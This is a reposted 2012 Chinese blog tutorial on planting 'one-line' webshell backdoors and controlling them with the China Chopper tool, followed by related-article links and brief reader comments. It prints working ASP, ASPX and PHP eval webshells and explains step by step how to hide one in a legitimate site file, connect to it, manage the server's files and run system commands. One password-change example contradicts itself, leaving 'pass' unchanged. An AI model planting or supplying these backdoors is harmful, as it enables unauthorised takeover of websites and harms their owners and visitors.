当前位置:首页 > 随笔 > 正文内容

一句话与中国菜刀的用法

光的传人13年前 (2012-11-15)随笔9195

 注:本文转载,仅用来个人学习。

菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp的一句话的密码改成drvfan,那么改完之后就是这样的:
<%eval request(“pass”)%>
其他同理。
要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。
当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp.php文件,这个asp.php文件的全部内容就只有一个一句话,也是可以的。
插入了一句话木马,下面就是连接了。
在菜刀主界面,右击,选择“添加”,
在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的可以不用填,
填完之后单击“添加”,就可以了。
添加完毕后,你的这个一句话的shell会显示到菜刀主界面里,鼠标右击它,选择“文件管理”,就可以看到网站上的文件了
所以,使用菜刀,一定要熟练运用一句话
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
在菜刀工具里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能
如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了

扫描二维码推送至手机访问。

版权声明:本文由光的传人博客www.liu16.com发布,如需转载请注明出处。

本文链接:http://www.liu16.com/post/maicaidao.html

标签: 黑客
分享给朋友:

相关文章

华为麦芒6PK荣耀畅玩7x,几点小差别竟然差这么多钱!

华为麦芒6PK荣耀畅玩7x,几点小差别竟然差这么多钱!

看着今天刚发布的荣耀畅玩7x,又想到上个月刚发布的华为麦芒6,突然感觉这俩手机差不多呢?但是价格差得可就多了!同样的CPU,同样的运行内存,同样的后置双摄像头,差不多的屏幕尺寸跟分辨率,从前面看基本上差不多的样子,就是后面摄像头的位置有所不...

无痛人流重庆哪个医院好?教你找到真正需要的医院

无痛人流重庆哪个医院好?教你找到真正需要的医院

无痛人流重庆哪个医院好?当你默默的搜索这个信息的时候,发现打开很多网站,看了很多文章,都不是自己想要的信息,怎么办?找个重庆无痛人流医院怎么这么难呢?软文、推广文章满天飞,怎样在这繁多的信息里找到自己需要的信息呢?本文就来简单介绍下如何在繁...

联想s820升级VIBEROM 1.0后无法root

联想s820升级VIBEROM 1.0后无法root

不知道这次升级是不是针对之前数字公司推出的软件导致联想手机可以不知不觉的root,升级后的系统是viberom 1.0,相对于用户体验来说,我觉得不如以前版本的好。主题少,界面不美观,以前系统中的主题不能全部应用,自带的主题确实不好看,令人...

6141194598389诈骗电话

6141194598389诈骗电话

刚接到一个来电显示为“6141194598389”的电话,吆喝着“这里是中国邮政,您有一封邮件未领取,人工服务请按9……”反复播放这段录音……一听就是骗人的把戏,也许按了就会有更高级的诈骗陷阱或者扣费陷阱,工作忙懒得理这些骗子。过年了,骗子...

相信自己的感觉,还是听从别人的劝告?

相信自己的感觉,还是听从别人的劝告?

感情的事,说不清,道不明~要相信自己的感觉么?有时候真的是:当局者迷旁观者清!要听从别人的劝告么?可有时候别人的意见也只是一家之言!喜欢,可以狠狠的放在心里面,没必要挂在嘴边,让很多人知道!有时候自己知道,让对方知道一点点就够了!别人,只是...

Excel发现不可读取内容最简单解决方法

Excel发现不可读取内容最简单解决方法

今天同事有一次出现了这种情况:Excel在"XXX.xls"中发现不可读取的内容,是否恢复此工作簿的内容?如果信任此工作簿的来源,请单击"是 ",这种情况呢,单击“是”能打开,但是数据没有了!你说悲摧...

评论列表

空气源
13年前 (2013-04-07)

php的不懂呀!路过支持一下呗

健康使者
13年前 (2012-12-20)

学习了

女装报告
13年前 (2012-12-11)

这是要教我们啥呀?

智能电网
13年前 (2012-12-06)

鸭梨山大,楼主这篇藐似没看懂

长安婚纱摄影
13年前 (2012-11-30)

鸭梨,太有才了!

南阳金巴黎婚纱摄影
13年前 (2012-11-24)

好,顶

奶茶
13年前 (2012-11-22)

菜刀不但是用来切菜还可以做其他很多东西。。。

wordpress博客主机
13年前 (2012-11-21)

学习了

霍致永博客
13年前 (2012-11-20)

这个标题太震撼啦哈哈欢迎来访

快播电影
13年前 (2012-11-20)

看不懂 PHP了,吐血了

李志红博客
13年前 (2012-11-19)

不是很懂,只来看看。

男装
13年前 (2012-11-19)

看了半天,因为不懂,所以还是没有看懂

比分直播
13年前 (2012-11-16)

来学习了,谢谢分享

润初颜
13年前 (2012-11-16)

php的不懂呀!路过支持一下

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。